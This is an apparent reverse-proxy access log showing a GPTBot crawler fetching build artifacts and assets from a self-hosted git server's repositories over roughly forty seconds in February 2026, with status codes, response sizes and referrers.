AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" -[17/Feb/2026:19:53:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html?display=rendered" [Client 74.7.227.38] [Length 10990] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" -[17/Feb/2026:19:53:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html?display=rendered" [Client 74.7.227.38] [Length 10962] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" -[17/Feb/2026:19:53:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html?display=rendered" [Client 74.7.227.38] [Length 10990] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" -[17/Feb/2026:19:53:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html?display=source" [Client 74.7.227.38] [Length 474034] [Gzip 19.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" -[17/Feb/2026:19:53:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html?display=source" [Client 74.7.227.38] [Length 492803] [Gzip 19.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" -[17/Feb/2026:19:53:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html?display=rendered" [Client 74.7.227.38] [Length 10987] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" -[17/Feb/2026:19:53:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html?display=rendered" [Client 74.7.227.38] [Length 10961] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" -[17/Feb/2026:19:53:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html?display=rendered" [Client 74.7.227.38] [Length 10986] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" -[17/Feb/2026:19:53:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html?display=rendered" [Client 74.7.227.38] [Length 10961] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" -[17/Feb/2026:19:53:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html?display=rendered" [Client 74.7.227.38] [Length 10990] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" -[17/Feb/2026:19:53:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/Analysis-00.toc?display=rendered" [Client 74.7.227.38] [Length 11178] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/Analysis-00.toc" -[17/Feb/2026:19:53:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt?display=rendered" [Client 74.7.227.38] [Length 11186] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" -[17/Feb/2026:19:53:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt?display=rendered" [Client 74.7.227.38] [Length 11185] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" -[17/Feb/2026:19:53:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt?display=rendered" [Client 74.7.227.38] [Length 11185] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" -[17/Feb/2026:19:53:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt?display=source" [Client 74.7.227.38] [Length 14301] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" -[17/Feb/2026:19:53:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt?display=source" [Client 74.7.227.38] [Length 14300] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" -[17/Feb/2026:19:53:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt?display=source" [Client 74.7.227.38] [Length 14018] [Gzip 3.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" -[17/Feb/2026:19:53:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json?display=source" [Client 74.7.227.38] [Length 14331] [Gzip 5.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:19:53:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json?display=source" [Client 74.7.227.38] [Length 14332] [Gzip 5.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:19:54:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json?display=rendered" [Client 74.7.227.38] [Length 11144] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:19:54:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json?display=rendered" [Client 74.7.227.38] [Length 11144] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:19:54:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json?display=rendered" [Client 74.7.227.38] [Length 11146] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:19:54:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.assets.cache?display=rendered" [Client 74.7.227.38] [Length 11157] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.assets.cache" -[17/Feb/2026:19:54:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs?display=rendered" [Client 74.7.227.38] [Length 11221] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs" -[17/Feb/2026:19:54:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json?display=source" [Client 74.7.227.38] [Length 14333] [Gzip 5.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:19:54:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/css" [Client 74.7.227.38] [Length 10347] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets" -[17/Feb/2026:19:54:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg?display=rendered" [Client 74.7.227.38] [Length 11109] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" -[17/Feb/2026:19:54:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg?display=rendered" [Client 74.7.227.38] [Length 11108] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" -[17/Feb/2026:19:54:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg?display=rendered" [Client 74.7.227.38] [Length 11108] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" -[17/Feb/2026:19:54:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html?display=rendered" [Client 74.7.227.38] [Length 11184] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" -[17/Feb/2026:19:54:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html?display=rendered" [Client 74.7.227.38] [Length 11183] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" -[17/Feb/2026:19:54:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html?display=rendered" [Client 74.7.227.38] [Length 11184] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" -[17/Feb/2026:19:54:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.FileListAbsolute.txt?display=source" [Client 74.7.227.38] [Length 11503] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.FileListAbsolute.txt" -[17/Feb/2026:19:54:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.FileListAbsolute.txt?display=rendered" [Client 74.7.227.38] [Length 11237] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.FileListAbsolute.txt" -[17/Feb/2026:19:54:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs?display=source" [Client 74.7.227.38] [Length 11620] [Gzip 3.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs" -[17/Feb/2026:19:54:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs?display=rendered" [Client 74.7.227.38] [Length 11221] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs" -[17/Feb/2026:19:54:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html?display=source" [Client 74.7.227.38] [Length 492262] [Gzip 19.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" -[17/Feb/2026:19:54:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html?display=source" [Client 74.7.227.38] [Length 493062] [Gzip 19.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" -[17/Feb/2026:19:54:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html?display=source" [Client 74.7.227.38] [Length 474273] [Gzip 19.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" -[17/Feb/2026:19:54:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.CoreCompileInputs.cache?display=source" [Client 74.7.227.38] [Length 11376] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.CoreCompileInputs.cache" -[17/Feb/2026:19:54:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs?display=source" [Client 74.7.227.38] [Length 12026] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs" -[17/Feb/2026:19:54:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/assets/css" [Client 74.7.227.38] [Length 10238] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/css" -[17/Feb/2026:19:54:20 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_upload/main/html/assets/css" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/css" -[17/Feb/2026:19:54:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_upload/main/html/assets/css" -[17/Feb/2026:19:54:20 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/html/assets/css" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/css" -[17/Feb/2026:19:54:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/html/assets/css" -[17/Feb/2026:19:54:21 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/html/assets/css" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/css" -[17/Feb/2026:19:54:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/html/assets/css" -[17/Feb/2026:19:54:21 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/static/css/style.css" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/templates/index.html" -[17/Feb/2026:19:54:22 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a.diff" -[17/Feb/2026:19:54:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 74.7.227.38] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 